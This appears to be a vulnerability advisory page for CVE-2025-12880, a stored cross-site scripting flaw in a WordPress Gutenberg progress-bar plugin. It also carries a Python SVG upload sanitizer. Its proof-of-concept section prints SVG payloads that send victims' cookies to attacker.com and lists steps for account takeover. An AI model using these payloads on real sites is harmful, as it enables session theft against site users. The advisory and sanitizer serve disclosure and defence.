Security Vulnerability Report
CVE-2025-12880 CVSS 5.4 MEDIUM

CVE-2025-12880

Published: 2025-11-11 04:15:51
Last Modified: 2026-04-15 00:35:42

Description

The Progress Bar Blocks for Gutenberg plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Progress Bar Blocks for Gutenberg <= 1.0.0 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
xml
<!-- Malicious SVG file content for CVE-2025-12880 -->
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)">
  <script>document.location='https://attacker.com/steal?cookie='+encodeURIComponent(document.cookie)</script>
</svg>

<!-- PoC Explanation: -->
<!-- 1. Create an SVG file with malicious JavaScript code -->
<!-- 2. Upload the SVG file through the vulnerable plugin's upload function -->
<!-- 3. When other users access the uploaded SVG file, the script executes -->
<!-- 4. Attacker can steal session cookies and perform account takeover -->

<!-- Alternative PoC using event handlers: -->
<svg xmlns="http://www.w3.org/2000/svg">
  <rect width="100%" height="100%" fill="red" onload="fetch('https://attacker.com/log?data='+document.cookie)"/>
</svg>
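A server-side gate for the upload path the description covers, as an added example that is not part of this report or of the plugin's own code: it parses a candidate SVG with Python's standard library and lists the active-content patterns a sanitizer has to reject or strip before the file is stored, namely script and foreignObject elements, on* event-handler attributes (the vector in both PoC variants above) and javascript: URLs in href; the sample SVG strings are constructed for this example.

```python
"""Reject SVG uploads that carry active content (added example, not plugin code)."""
import xml.etree.ElementTree as ET

ACTIVE_TAGS = {"script", "foreignobject"}   # elements that can run script or embed HTML


def _local(name: str) -> str:
    """Strip a '{namespace}' prefix and lower-case the XML name."""
    return name.rsplit("}", 1)[-1].lower()


def svg_findings(data: bytes) -> list[str]:
    """Return reasons to reject the file; an empty list means no active content found."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"unparseable XML: {exc}"]
    findings = []
    if _local(root.tag) != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for elem in root.iter():
        if not isinstance(elem.tag, str):      # skip comments / processing instructions
            continue
        tag = _local(elem.tag)
        if tag in ACTIVE_TAGS:
            findings.append(f"active element <{tag}>")
        for attr, value in elem.attrib.items():
            name = _local(attr)                # xlink:href arrives as {xlink-namespace}href
            if name.startswith("on"):
                findings.append(f"event handler {name} on <{tag}>")
            elif name == "href" and value.strip().lower().startswith("javascript:"):
                findings.append(f"javascript: URL in href on <{tag}>")
    return findings


def is_safe_svg(data: bytes) -> bool:
    """Upload gate: True only when the parser found nothing active."""
    return not svg_findings(data)


# Constructed samples for this example.
CLEAN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10" fill="red"/></svg>'
ONLOAD_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" onload="x()"><rect onload="y()"/></svg>'
SCRIPT_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><script>x()</script></svg>'

if __name__ == "__main__":
    for label, sample in [("clean", CLEAN_SVG), ("onload", ONLOAD_SVG), ("script", SCRIPT_SVG)]:
        print(label, "safe" if is_safe_svg(sample) else svg_findings(sample))
```

A gate like this belongs in front of the media library write (or SVG uploads are disabled outright); it complements, rather than replaces, serving user uploads with a restrictive Content-Security-Policy.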

References

https://wordpress.org/plugins/progressmatify-blocks/
https://www.wordfence.com/threat-intel/vulnerabilities/id/3bc48d4d-eeee-47f7-be5e-0d6a43473aa0?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12880", "sourceIdentifier": "[email protected]", "published": "2025-11-11T04:15:50.580", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Progress Bar Blocks for Gutenberg plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://wordpress.org/plugins/progressmatify-blocks/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3bc48d4d-eeee-47f7-be5e-0d6a43473aa0?source=cve", "source": "[email protected]"}]}}